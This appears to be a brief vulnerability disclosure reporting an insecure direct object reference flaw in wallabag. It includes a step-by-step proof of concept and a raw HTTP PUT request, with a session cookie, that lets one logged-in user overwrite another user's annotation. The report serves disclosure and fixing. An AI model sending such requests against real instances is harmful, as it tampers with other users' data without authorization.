Description
IDOR vulnerability was discovered in wallabag.
Proof of Concept
- Login as a victim.
- Create an entry and an annotation. In this case the annotation’s ID is 3.
- Login as an attacker.
- Send the following request.
request
PUT /annotations/3 HTTP/1.1
Host: localhost:8000
Cookie: PHPSESSID=e23e2dfc1b530c1884bf17248448b979
Content-Length: 21
{"id":3,"text":"xxx"}
- Victim’s annotation created on step 2 is updated.